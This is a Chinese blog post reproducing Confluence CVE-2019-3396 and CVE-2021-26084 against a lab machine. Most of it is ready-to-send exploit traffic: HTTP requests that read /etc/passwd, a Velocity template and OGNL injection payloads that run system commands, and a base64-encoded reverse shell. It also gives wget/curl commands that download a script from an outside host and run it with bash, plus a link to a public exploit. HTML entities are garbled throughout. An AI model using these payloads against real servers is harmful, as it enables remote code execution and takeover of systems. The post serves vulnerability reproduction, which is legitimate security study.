当前位置: 开发笔记 > 编程语言 > 正文

confluence漏洞复现

作者：我在等白色的雪 | 来源：互联网 | 2023-08-17 20:04

文章目录1.confluence路径穿越与命令之执行(CVE-2019-3396)1.1利用2.ConfluenceOGNL表达式注入代码执行漏洞（CVE-2021-

文章目录

1. confluence路径穿越与命令之执行 (CVE-2019-3396)
- 1.1 利用
2. Confluence OGNL表达式注入代码执行漏洞&＃xff08;CVE-2021-26084&＃xff09;
- 2.1 利用
参考文章

1. confluence路径穿越与命令之执行 (CVE-2019-3396)

影响版本&＃xff1a;6.14.2版本前

通过该漏洞&＃xff0c;攻击者可以读取任意文件&＃xff0c;或利用Velocity模板注入执行任意命令。

1.1 利用

POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: 192.168.171.139:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://192.168.171.139:8090/pages/resumedraft.action?draftId&＃61;786457&draftShareId&＃61;056b55bc-fc4a-487b-b1e1-8f673f280c23& Content-Type: application/json; charset&＃61;utf-8 Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}

在这里插入图片描述

命令执行&＃xff1a;
模版文件&＃xff1a;

#set ($e&＃61;"exp") #set ($a&＃61;$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input&＃61;$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc &＃61; $e.getClass().forName("java.util.Scanner")) #set($constructor &＃61; $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) #set($scan&＃61;$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $scan.next() #end

在这里插入图片描述

POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: 192.168.171.139:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://192.168.171.139:8090/pages/resumedraft.action?draftId&＃61;786457&draftShareId&＃61;056b55bc-fc4a-487b-b1e1-8f673f280c23& Content-Type: application/json; charset&＃61;utf-8 Content-Length: 201{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://192.168.171.1/exp.vm","cmd":"ls"}}}

在这里插入图片描述

反弹shell&＃xff1a;

POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: 192.168.171.139:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://192.168.171.139:8090/pages/resumedraft.action?draftId&＃61;786457&draftShareId&＃61;056b55bc-fc4a-487b-b1e1-8f673f280c23& Content-Type: application/json; charset&＃61;utf-8 Content-Length: 296{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://192.168.171.1/exp.vm","cmd":"bash -c {echo,YmFzaCAtaSA&＃43;JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ&＃61;&＃61;}|{base64,-d}|{bash,-i}"}}}

在这里插入图片描述

2. Confluence OGNL表达式注入代码执行漏洞&＃xff08;CVE-2021-26084&＃xff09;

2.1 利用

命令执行&＃xff1a;

POST /pages/doenterpagevariables.action HTTP/1.1 Host: 192.168.171.139:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1066queryString&＃61;%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027Javascript%5cu0027%29.%5cu0065val%28%5cu0027var&＃43;isWin&＃43;%3d&＃43;java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b&＃43;var&＃43;cmd&＃43;%3d&＃43;new&＃43;java.lang.String%28%5cu0022whoami%5cu0022%29%3bvar&＃43;p&＃43;%3d&＃43;new&＃43;java.lang.ProcessBuilder%28%29%3b&＃43;if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c&＃43;%5cu0022%2fc%5cu0022%2c&＃43;cmd%29%3b&＃43;%7d&＃43;else%7bp.command%28%5cu0022bash%5cu0022%2c&＃43;%5cu0022-c%5cu0022%2c&＃43;cmd%29%3b&＃43;%7dp.redirectErrorStream%28true%29%3b&＃43;var&＃43;process%3d&＃43;p.start%28%29%3b&＃43;var&＃43;inputStreamReader&＃43;%3d&＃43;new&＃43;java.io.InputStreamReader%28process.getInputStream%28%29%29%3b&＃43;var&＃43;bufferedReader&＃43;%3d&＃43;new&＃43;java.io.BufferedReader%28inputStreamReader%29%3b&＃43;var&＃43;line&＃43;%3d&＃43;%5cu0022%5cu0022%3b&＃43;var&＃43;output&＃43;%3d&＃43;%5cu0022%5cu0022%3b&＃43;while%28%28line&＃43;%3d&＃43;bufferedReader.readLine%28%29%29&＃43;%21%3d&＃43;null%29%7boutput&＃43;%3d&＃43;output&＃43;%2b&＃43;line&＃43;%2b&＃43;java.lang.Character.toString%2810%29%3b&＃43;%7d%5cu0027%29%7d%2b%5cu0027

在这里插入图片描述

反弹shell&＃xff1a;

POST /pages/doenterpagevariables.action HTTP/1.1 Host: 192.168.171.139:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 47queryString&＃61;%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027Javascript%5cu0027%29.%5cu0065val%28%5cu0027var&＃43;isWin&＃43;%3d&＃43;java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b&＃43;var&＃43;cmd&＃43;%3d&＃43;new&＃43;java.lang.String%28%5cu0022fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff%5cu0022%29%3bvar&＃43;p&＃43;%3d&＃43;new&＃43;java.lang.ProcessBuilder%28%29%3b&＃43;if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c&＃43;%5cu0022%2fc%5cu0022%2c&＃43;cmd%29%3b&＃43;%7d&＃43;else%7bp.command%28%5cu0022bash%5cu0022%2c&＃43;%5cu0022-c%5cu0022%2c&＃43;cmd%29%3b&＃43;%7dp.redirectErrorStream%28true%29%3b&＃43;var&＃43;process%3d&＃43;p.start%28%29%3b&＃43;var&＃43;inputStreamReader&＃43;%3d&＃43;new&＃43;java.io.InputStreamReader%28process.getInputStream%28%29%29%3b&＃43;var&＃43;bufferedReader&＃43;%3d&＃43;new&＃43;java.io.BufferedReader%28inputStreamReader%29%3b&＃43;var&＃43;line&＃43;%3d&＃43;%5cu0022%5cu0022%3b&＃43;var&＃43;output&＃43;%3d&＃43;%5cu0022%5cu0022%3b&＃43;while%28%28line&＃43;%3d&＃43;bufferedReader.readLine%28%29%29&＃43;%21%3d&＃43;null%29%7boutput&＃43;%3d&＃43;output&＃43;%2b&＃43;line&＃43;%2b&＃43;java.lang.Character.toString%2810%29%3b&＃43;%7d%5cu0027%29%7d%2b%5cu0027

普通的反弹shell代码都不可以&＃xff0c;包括base64编码的也无法使用&＃xff0c;因此我们采用下载文件执行的方式来实现&＃xff0c;文件内容为反弹shell代码&＃xff0c;将payload中的ffffff换成如下命令即可&＃xff1a;

在这里插入图片描述

wget http://192.168.171.1:8000/1.sh -O /tmp/1.sh # 如果下载失败可用下面的 curl http://192.168.171.1:8000/1.sh -o /tmp/1.sh bash /tmp/1.sh

在这里插入图片描述

也可使用exp来利用此漏洞&＃xff0c;但是exp中也无法执行反弹shell代码&＃xff1a;
exp地址&＃xff1a;https://github.com/r0ckysec/CVE-2021-26084_Confluence

另一个payload&＃xff0c;无回显&＃xff1a;

vulhub
CVE-2019-3396 复现
payload

推荐阅读

post
Webmin远程命令执行漏洞复现及防护方法

本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法，同时提供了防护方法。漏洞存在于Webmin的找回密码页面中，攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外，还指出了参考链接中的数据包不准确的问题，并解释了漏洞触发的条件。最后，给出了防护方法以避免受到该漏洞的攻击。 ... [详细]

蜡笔小新 2023-12-13 16:14:53
post
自动轮播，反转播放的ViewPagerAdapter的使用方法和效果展示

本文介绍了如何使用自动轮播、反转播放的ViewPagerAdapter，并展示了其效果。该ViewPagerAdapter支持无限循环、触摸暂停、切换缩放等功能。同时提供了使用GIF.gif的示例和github地址。通过LoopFragmentPagerAdapter类的getActualCount、getActualItem和getActualPagerTitle方法可以实现自定义的循环效果和标题展示。 ... [详细]

蜡笔小新 2023-12-13 14:41:31
dll
Android源码深入理解JNI技术的概述和应用

本文介绍了Android源码中的JNI技术，包括概述和应用。JNI是Java Native Interface的缩写，是一种技术，可以实现Java程序调用Native语言写的函数，以及Native程序调用Java层的函数。在Android平台上，JNI充当了连接Java世界和Native世界的桥梁。本文通过分析Android源码中的相关文件和位置，深入探讨了JNI技术在Android开发中的重要性和应用场景。 ... [详细]

蜡笔小新 2023-12-13 10:00:57
dll
C++字符字符串处理及字符集编码方案

本文介绍了C++中字符字符串处理的问题，并详细解释了字符集编码方案，包括UNICODE、Windows apps采用的UTF-16编码、ASCII、SBCS和DBCS编码方案。同时说明了ANSI C标准和Windows中的字符/字符串数据类型实现。文章还提到了在编译时需要定义UNICODE宏以支持unicode编码，否则将使用windows code page编译。最后，给出了相关的头文件和数据类型定义。 ... [详细]

蜡笔小新 2023-12-13 04:59:58
dll
如何清除Eclipse中SVN用户的设置

本文介绍了如何清除Eclipse中SVN用户的设置。首先需要查看使用的SVN接口，然后根据接口类型找到相应的目录并删除相关文件。最后使用SVN更新或提交来应用更改。 ... [详细]

蜡笔小新 2023-12-12 14:42:31
post
Spring常用注解（绝对经典），全靠这份Java知识点PDF大全

本文介绍了Spring常用注解和注入bean的注解，包括@Bean、@Autowired、@Inject等，同时提供了一个Java知识点PDF大全的资源链接。其中详细介绍了ColorFactoryBean的使用，以及@Autowired和@Inject的区别和用法。此外，还提到了@Required属性的配置和使用。 ... [详细]

蜡笔小新 2023-12-12 10:15:07
object
绕过WAF的XSS检测机制及构建XSS payload的方法

本文介绍了绕过WAF的XSS检测机制的方法，包括确定payload结构、测试和混淆。同时提出了一种构建XSS payload的方法，该payload与安全机制使用的正则表达式不匹配。通过清理用户输入、转义输出、使用文档对象模型（DOM）接收器和源、实施适当的跨域资源共享（CORS）策略和其他安全策略，可以有效阻止XSS漏洞。但是，WAF或自定义过滤器仍然被广泛使用来增加安全性。本文的方法可以绕过这种安全机制，构建与正则表达式不匹配的XSS payload。 ... [详细]

蜡笔小新 2023-12-11 19:42:30
object
Netty拆包粘包问题解决 —— 特殊结束符

本文介绍了解决Netty拆包粘包问题的一种方法——使用特殊结束符。在通讯过程中，客户端和服务器协商定义一个特殊的分隔符号，只要没有发送分隔符号，就代表一条数据没有结束。文章还提供了服务端的示例代码。 ... [详细]

蜡笔小新 2023-12-14 18:02:45
object
Java实现大数乘法（分治算法）

本文介绍了使用Java实现大数乘法的分治算法，包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]

蜡笔小新 2023-12-14 15:43:50
object
Metasploit攻击渗透实践

本文介绍了Metasploit攻击渗透实践的内容和要求，包括主动攻击、针对浏览器和客户端的攻击，以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码，以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]

蜡笔小新 2023-12-14 12:14:09
object
OC学习笔记之@property和@synthesize

本文介绍了OC学习笔记中的@property和@synthesize，包括属性的定义和合成的使用方法。通过示例代码详细讲解了@property和@synthesize的作用和用法。 ... [详细]

蜡笔小新 2023-12-14 12:05:06
object
win10系统搭建Java开发环境的操作方法

本文介绍了win10系统搭建Java开发环境的详细操作方法，包括下载Windows10系统和Java SE，安装Java开发环境，设置变量等步骤。操作简单，只需按照指导进行即可。 ... [详细]

蜡笔小新 2023-12-14 11:46:43
object
postman测试登录后的接口_使用postman进行接口测试的方法(测试用户管理模块)

本文介绍了使用postman进行接口测试的方法，以测试用户管理模块为例。首先需要下载并安装postman，然后创建基本的请求并填写用户名密码进行登录测试。接下来可以进行用户查询和新增的测试。在新增时，可以进行异常测试，包括用户名超长和输入特殊字符的情况。通过测试发现后台没有对参数长度和特殊字符进行检查和过滤。 ... [详细]

蜡笔小新 2023-12-14 10:29:45
post
MFC动态创建窗口的实现方法及注意事项

本文介绍了在MFC下利用C++和MFC的特性动态创建窗口的方法，包括继承现有的MFC类并加以改造、插入工具栏和状态栏对象的声明等。同时还提到了窗口销毁的处理方法。本文详细介绍了实现方法并给出了相关注意事项。 ... [详细]

蜡笔小新 2023-12-11 15:09:27
post
利用RxJava实现的事件总线（Event Bus）及其使用方法介绍

本文介绍了RxJava在Android开发中的广泛应用以及其在事件总线（Event Bus）实现中的使用方法。RxJava是一种基于观察者模式的异步java库，可以提高开发效率、降低维护成本。通过RxJava，开发者可以实现事件的异步处理和链式操作。对于已经具备RxJava基础的开发者来说，本文将详细介绍如何利用RxJava实现事件总线，并提供了使用建议。 ... [详细]

蜡笔小新 2023-12-11 12:16:40

我在等白色的雪

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章